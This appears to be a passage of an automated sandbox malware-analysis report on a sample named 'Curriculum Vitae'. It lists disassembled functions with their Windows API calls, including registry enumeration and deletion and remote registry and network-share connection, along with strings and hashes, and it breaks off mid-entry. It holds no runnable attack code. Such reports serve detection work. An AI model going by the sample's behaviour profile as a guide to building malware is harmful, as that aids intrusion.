                      Similarity
                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                      • String ID:
                      • API String ID: 161543041-0
                      • Opcode ID: 6a986a3c7590bfec8b351d89f3b7d9959d166097ad1bfe47f13a0b2d3f10a066
                      • Instruction ID: 7310188cf8e35b5c1ca4495f1476cd564eecf131962b7a758791ab67b62fea25
                      • Opcode Fuzzy Hash: 6a986a3c7590bfec8b351d89f3b7d9959d166097ad1bfe47f13a0b2d3f10a066
                      • Instruction Fuzzy Hash: A2317C31B447049FEB25AA79E845B6A77EAFF50350F19441AE449D7195DF30EC40CB30
                      Function 00D9365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetClassNameW.USER32(?,?,00000100), ref: 00D9369C
                      • _wcslen.LIBCMT ref: 00D936A7
                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00D93797
                      • GetClassNameW.USER32(?,?,00000400), ref: 00D9380C
                      • GetDlgCtrlID.USER32(?), ref: 00D9385D
                      • GetWindowRect.USER32(?,?), ref: 00D93882
                      • GetParent.USER32(?), ref: 00D938A0
                      • ScreenToClient.USER32(00000000), ref: 00D938A7
                      • GetClassNameW.USER32(?,?,00000100), ref: 00D93921
                      • GetWindowTextW.USER32(?,?,00000400), ref: 00D9395D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                      • String ID: %s%u
                      • API String ID: 4010501982-679674701
                      • Opcode ID: 20de8cec72e3eabf5a18789b6f79680edcfdfa2d07664f20a65c1cfbdc71f69d
                      • Instruction ID: 4c07d999b33f16709433feec807dcbaf5db2e6a14b1a9ea75e1962fb8568a08b
                      • Opcode Fuzzy Hash: 20de8cec72e3eabf5a18789b6f79680edcfdfa2d07664f20a65c1cfbdc71f69d
                      • Instruction Fuzzy Hash: 8191AF71204706AFDB19DF64C885FAAF7A8FF44350F048629F999D2190DB30EA59CBB1
                      Function 00D94954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                      Download Yara Rule
                      APIs
                      • GetClassNameW.USER32(?,?,00000400), ref: 00D94994
                      • GetWindowTextW.USER32(?,?,00000400), ref: 00D949DA
                      • _wcslen.LIBCMT ref: 00D949EB
                      • CharUpperBuffW.USER32(?,00000000), ref: 00D949F7
                      • _wcsstr.LIBVCRUNTIME ref: 00D94A2C
                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00D94A64
                      • GetWindowTextW.USER32(?,?,00000400), ref: 00D94A9D
                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00D94AE6
                      • GetClassNameW.USER32(?,?,00000400), ref: 00D94B20
                      • GetWindowRect.USER32(?,?), ref: 00D94B8B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                      • String ID: ThumbnailClass
                      • API String ID: 1311036022-1241985126
                      • Opcode ID: ce7c85be459a23b0d4334801b10fd662c29d8e7c70986e6b60c38a12eae59d51
                      • Instruction ID: 044a21c561a18d70b3ed9dfc45648b3a179646671bf5cd6db63ef6c2674c32aa
                      • Opcode Fuzzy Hash: ce7c85be459a23b0d4334801b10fd662c29d8e7c70986e6b60c38a12eae59d51
                      • Instruction Fuzzy Hash: 17919B711042069FDF04DF14C995FAAB7E8EF84358F088469FD899A196DB30ED4ACBB1
                      Function 00DC8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D49BB2
                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00DC8D5A
                      • GetFocus.USER32 ref: 00DC8D6A
                      • GetDlgCtrlID.USER32(00000000), ref: 00DC8D75
                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00DC8E1D
                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00DC8ECF
                      • GetMenuItemCount.USER32(?), ref: 00DC8EEC
                      • GetMenuItemID.USER32(?,00000000), ref: 00DC8EFC
                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00DC8F2E
                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00DC8F70
                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DC8FA1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                      • String ID: 0
                      • API String ID: 1026556194-4108050209
                      • Opcode ID: 214789858a91d48d27e0e6c95d44e84386944924555883972300ca2662f26799
                      • Instruction ID: bac1e4bd7d37ff7d624f5f7ea9fef79443f359f823bf7de7095375cc43b63a99
                      • Opcode Fuzzy Hash: 214789858a91d48d27e0e6c95d44e84386944924555883972300ca2662f26799
                      • Instruction Fuzzy Hash: 35817A715083029FDB11CF24C884EABBBE9EF88314F18095DF98997291DB31D905EBB1
                      Function 00DBCC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                      Download Yara Rule
                      APIs
                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00DBCC64
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00DBCC8D
                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00DBCD48
                        • Part of subcall function 00DBCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00DBCCAA
                        • Part of subcall function 00DBCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00DBCCBD
                        • Part of subcall function 00DBCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DBCCCF
                        • Part of subcall function 00DBCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00DBCD05
                        • Part of subcall function 00DBCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00DBCD28
                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DBCCF3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                      • String ID: RegDeleteKeyExW$advapi32.dll
                      • API String ID: 2734957052-4033151799
                      • Opcode ID: bf9d0802544c770355d6d92812cf97856ebb1a9fcb2d4112ad939ccab5ddca49
                      • Instruction ID: 1ef570a1417914ad930d77c04eda50ac22d8871b23699673d15ea730f0354388
                      • Opcode Fuzzy Hash: bf9d0802544c770355d6d92812cf97856ebb1a9fcb2d4112ad939ccab5ddca49
                      • Instruction Fuzzy Hash: B331807591122AFBD7208B51DC88EFFBB7CFF55750F041165EA0AE2240D6309A45AAB0
                      Function 00D9E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                      Download Yara Rule
                      APIs
                      • timeGetTime.WINMM ref: 00D9E6B4
                        • Part of subcall function 00D4E551: timeGetTime.WINMM(?,?,00D9E6D4), ref: 00D4E555
                      • Sleep.KERNEL32(0000000A), ref: 00D9E6E1
                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00D9E705
                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00D9E727
                      • SetActiveWindow.USER32 ref: 00D9E746
                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00D9E754
                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00D9E773
                      • Sleep.KERNEL32(000000FA), ref: 00D9E77E
                      • IsWindow.USER32 ref: 00D9E78A
                      • EndDialog.USER32(00000000), ref: 00D9E79B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                      • String ID: BUTTON
                      • API String ID: 1194449130-3405671355
                      • Opcode ID: 92e8493d8304e84752078340aa9b878cf3800311636aa805dde8a785146ae96d
                      • Instruction ID: ed60e8a1fb33881c781415426982f3e95044d6da291ee9bfe9256cb8a94f6be0
                      • Opcode Fuzzy Hash: 92e8493d8304e84752078340aa9b878cf3800311636aa805dde8a785146ae96d
                      • Instruction Fuzzy Hash: 8D218470210306AFEF00AF62EC8DE253BA9F754748B181428F605D16B1DB73AC849B35
                      Function 00D9E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00D9EA5D
                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00D9EA73
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D9EA84
                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00D9EA96
                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00D9EAA7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: SendString$_wcslen
                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                      • API String ID: 2420728520-1007645807
                      • Opcode ID: 091b8b0e10fc5a5171f5e39689673fb2211f5972699e6ce62705e074c72602bb
                      • Instruction ID: 742265247861daeb6a75400b09bfb8bb67e2e4e01238fbb3759aade5d3383f6e
                      • Opcode Fuzzy Hash: 091b8b0e10fc5a5171f5e39689673fb2211f5972699e6ce62705e074c72602bb
                      • Instruction Fuzzy Hash: E1114221A9025D7DDB10E766DD4ADFB6B7CEBD1B00F454429B501A20D1EEF05909CAB0
                      Function 00D95CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                      Download Yara Rule
                      APIs
                      • GetDlgItem.USER32(?,00000001), ref: 00D95CE2
                      • GetWindowRect.USER32(00000000,?), ref: 00D95CFB
                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00D95D59
                      • GetDlgItem.USER32(?,00000002), ref: 00D95D69
                      • GetWindowRect.USER32(00000000,?), ref: 00D95D7B
                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00D95DCF
                      • GetDlgItem.USER32(?,000003E9), ref: 00D95DDD
                      • GetWindowRect.USER32(00000000,?), ref: 00D95DEF
                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00D95E31
                      • GetDlgItem.USER32(?,000003EA), ref: 00D95E44
                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00D95E5A
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00D95E67
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$ItemMoveRect$Invalidate
                      • String ID:
                      • API String ID: 3096461208-0
                      • Opcode ID: 5c896c214129214912f68d67bec944067f1c6f59996183389c701a2160d5f843
                      • Instruction ID: 73f85f17d203a4f9e335d66505e4f23bdf00bcc3974ac1291d0097d8a212deb7
                      • Opcode Fuzzy Hash: 5c896c214129214912f68d67bec944067f1c6f59996183389c701a2160d5f843
                      • Instruction Fuzzy Hash: 3E51FCB1A10706AFDF19CF68DD89EAEBBB5EB48300F148129F519E6294D7709E04CB60
                      Function 00D48BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D48F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D48BE8,?,00000000,?,?,?,?,00D48BBA,00000000,?), ref: 00D48FC5
                      • DestroyWindow.USER32(?), ref: 00D48C81
                      • KillTimer.USER32(00000000,?,?,?,?,00D48BBA,00000000,?), ref: 00D48D1B
                      • DestroyAcceleratorTable.USER32(00000000), ref: 00D86973
                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00D48BBA,00000000,?), ref: 00D869A1
                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00D48BBA,00000000,?), ref: 00D869B8
                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00D48BBA,00000000), ref: 00D869D4
                      • DeleteObject.GDI32(00000000), ref: 00D869E6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                      • String ID:
                      • API String ID: 641708696-0
                      • Opcode ID: 5106abbbbeeab330a5985a817c655ba1bd3a98f5a22988ff9a4ddd6a7b0bb622
                      • Instruction ID: 9323f9e539511fc56bcb4b73790fc9573bff73eb1cae0a2b8adb03df5158bdee
                      • Opcode Fuzzy Hash: 5106abbbbeeab330a5985a817c655ba1bd3a98f5a22988ff9a4ddd6a7b0bb622
                      • Instruction Fuzzy Hash: 81618C30502711DFCB25AF15D988B2977F1FB40362F585558E186AB6A0CB32E9D4EFB0
                      Function 00D49838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D49944: GetWindowLongW.USER32(?,000000EB), ref: 00D49952
                      • GetSysColor.USER32(0000000F), ref: 00D49862
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ColorLongWindow
                      • String ID:
                      • API String ID: 259745315-0
                      • Opcode ID: f60ec6abafbd8ee1160fdb927414ad9826ee76d18fb233f59176982c67779dc3
                      • Instruction ID: 6f0acfcc0a6bb2c85f414a3d97acef85125bd99c0f64cec56ac86134e4aa6ab1
                      • Opcode Fuzzy Hash: f60ec6abafbd8ee1160fdb927414ad9826ee76d18fb233f59176982c67779dc3
                      • Instruction Fuzzy Hash: 76418F311047419FDB209F3E9C94BBA7B65AB46320F285655FAA6872E5C731DC42DB30
                      Function 00D996E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00D7F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00D99717
                      • LoadStringW.USER32(00000000,?,00D7F7F8,00000001), ref: 00D99720
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00D7F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00D99742
                      • LoadStringW.USER32(00000000,?,00D7F7F8,00000001), ref: 00D99745
                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00D99866
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: HandleLoadModuleString$Message_wcslen
                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                      • API String ID: 747408836-2268648507
                      • Opcode ID: 778568a80a0788f50c14542ff0f5febac8d5e882a44a1c604957545f0dc95896
                      • Instruction ID: 794d8133c1b7dc80c280816e197db565cfb99314d21c4e11fadfc3958e7e60bd
                      • Opcode Fuzzy Hash: 778568a80a0788f50c14542ff0f5febac8d5e882a44a1c604957545f0dc95896
                      • Instruction Fuzzy Hash: 59412A72804209AACF04FBE4CE96EEEB778EF55340F504169F60572092EA75AF48CB71
                      Function 00D906DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D36B57: _wcslen.LIBCMT ref: 00D36B6A
                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00D907A2
                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00D907BE
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00D907DA
                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00D90804
                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00D9082C
                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00D90837
                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00D9083C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                      • API String ID: 323675364-22481851
                      • Opcode ID: 96a5fe42479073832f7d10d4c14bb8d6f7be7a50e150a4d16de5c7b93508edd5
                      • Instruction ID: 65c1695917f18e4832b0973a42da0aa64f4727069072688be0489aa658243edf
                      • Opcode Fuzzy Hash: 96a5fe42479073832f7d10d4c14bb8d6f7be7a50e150a4d16de5c7b93508edd5
                      • Instruction Fuzzy Hash: 5B41F272910229AFDF15EBA4EC95DEDB778EF44350F458129EA05A2260EA709E04CAB0
                      Function 00DA7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                      Download Yara Rule
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 00DA7AF3
                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00DA7B8F
                      • SHGetDesktopFolder.SHELL32(?), ref: 00DA7BA3
                      • CoCreateInstance.OLE32(00DCFD08,00000000,00000001,00DF6E6C,?), ref: 00DA7BEF
                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00DA7C74
                      • CoTaskMemFree.OLE32(?,?), ref: 00DA7CCC
                      • SHBrowseForFolderW.SHELL32(?), ref: 00DA7D57
                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00DA7D7A
                      • CoTaskMemFree.OLE32(00000000), ref: 00DA7D81
                      • CoTaskMemFree.OLE32(00000000), ref: 00DA7DD6
                      • CoUninitialize.OLE32 ref: 00DA7DDC
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                      • String ID:
                      • API String ID: 2762341140-0
                      • Opcode ID: 6e0e9b2fd4320007ed6271d1e2234a6119966ee81f2dac10b920a4acbe2c7147
                      • Instruction ID: 54c29205ed932001984cc22ef57056f450f91a398424c40f0b855b548c8b400a
                      • Opcode Fuzzy Hash: 6e0e9b2fd4320007ed6271d1e2234a6119966ee81f2dac10b920a4acbe2c7147
                      • Instruction Fuzzy Hash: 15C10975A04209AFCB14DF64C884DAEBBB9FF49314B148499E91ADB361D730EE45CBA0
                      Function 00DC541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00DC5504
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DC5515
                      • CharNextW.USER32(00000158), ref: 00DC5544
                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00DC5585
                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00DC559B
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DC55AC
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$CharNext
                      • String ID:
                      • API String ID: 1350042424-0
                      • Opcode ID: 3563e5818f5bae37f05f235e4c0e05c96e680fb5078c1b9d5e5fa0fd001f4f05
                      • Instruction ID: 81e305135d300a7520eaf550b1ebba6861098f30c7c7787f1e1334190bc5396d
